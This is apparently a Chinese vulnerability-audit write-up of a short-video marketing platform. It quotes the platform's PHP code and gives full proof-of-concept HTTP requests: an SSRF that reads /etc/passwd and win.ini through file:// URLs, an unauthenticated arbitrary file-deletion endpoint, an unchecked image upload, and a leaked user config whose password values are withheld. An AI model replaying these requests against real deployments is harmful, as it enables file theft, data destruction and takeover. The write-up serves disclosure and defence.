某短视频矩阵营销系统前台RCE漏洞审计

/*获取POI*/public function poihuoqu(){    $poi =  input('post.poi');    $url = trim($poi);    $info = curl_init();    curl_setopt($info,CURLOPT_RETURNTRANSFER,true);    curl_setopt($info,CURLOPT_HEADER,0);    curl_setopt($info,CURLOPT_NOBODY,0);    curl_setopt($info,CURLOPT_SSL_VERIFYPEER,false);    curl_setopt($info,CURLOPT_SSL_VERIFYPEER,false);    curl_setopt($info,CURLOPT_SSL_VERIFYHOST,false);    curl_setopt($info,CURLOPT_URL,$url);    $output = curl_exec($info);    curl_close($info);    //$id = stripos($output,"poi_id=");    $on = mb_stripos($output,"poi_id=");    $er = mb_stripos($output,"&");    $poiid = mb_substr($output,$on+7,$er-$on-7);    if($output){        return json(['code'=>1,'msg'=>$poiid]);    }else{        return json(['code'=>-1,'msg'=>'获取失败']);    }}

POST /index.php/admin/Userinfo/poihuoqu HTTP/2Host: 127.0.0.1Cache-Control: max-age=0Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneContent-Type: application/x-www-form-urlencodedSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 22poi=file:///etc/passwd

POST /index.php/admin/Userinfo/poihuoqu HTTP/2Host: 127.0.0.1Cache-Control: max-age=0Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneContent-Type: application/x-www-form-urlencodedSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 22poi=file:///C:/Windows/win.ini

<?php   if(isset($_POST['file'])){  $file = '../uploads/' . $_POST['file'];if(file_exists($file)){  unlink($file);}}?>

POST /static/admin/upload_file/php/remove_file.php HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Cache-Control: max-age=0Connection: keep-aliveContent-Length: 12Content-Type: application/x-www-form-urlencodedCookie: BJYSESSION=oorquahq7r9csc3can1hpcjkj3; PHPSESSID=6kqil2pldpq19cq7dt590uc54h; KOD_SESSION_SSO=ni6912a1a0d53k4rb6r6hgrhof; KOD_SESSION_ID_1bcdf=d358i7lc74rt2mrush7aao808hHost: 127.0.0.1:81Origin: http://127.0.0.1:81Referer: http://127.0.0.1:81/static/admin/upload_file/php/remove_file.phpSec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-user: ?1file=aaa.txt

请见文末

public functionupload_add(){  $file = request()->file('image');  if(!$file){    $this -> error('请选择上传的图片');  }  $info = $file->move(ROOT_PATH . 'public' . DS . 'uploads/images');  if($info){    $data = array(      'image'        =>$info->getSaveName(),      'uid'          =>session('uid'),    );    $id = input('post.id');    if(empty($id)){      $list = Db::name('img')->insert($data);    }else{      $list = Db::name('img')->where('id',$id)->update($data);    }    if($list){      $this -> success('上传成功',url('upload'));      // echo $info->getSaveName();    }else{      $this -> error('上传失败');    }  }else{    echo $file->getError();  }}

请见文末

请见文末

请见文末

<?php exit;?>{    "1": {        "name": "admin",        "path": "admin",        "password": "请见文末",        "userID": "1",        "role": "1",        "config": {            "sizeMax": "0",            "sizeUse": 1024        },        "groupInfo": {            "1": "write"        },        "createTime": 1653827726,        "status": 1,        "lastLogin": 1655653441    },    "100": {        "userID": "100",        "name": "demo",        "password": "请见文末",        "role": "2",        "config": {            "sizeMax": 5,            "sizeUse": 1048576        },        "groupInfo": {            "1": "write"        },        "path": "demo",        "status": 1,        "lastLogin": 1711702666,        "createTime": 1653827726    },    "101": {        "userID": "101",        "name": "guest",        "password": "请见文末",        "role": "100",        "config": {            "sizeMax": 0.1,            "sizeUse": 1048576        },        "groupInfo": {            "1": "read"        },        "path": "guest",        "status": 1,        "lastLogin": "",        "createTime": 1653827726    }}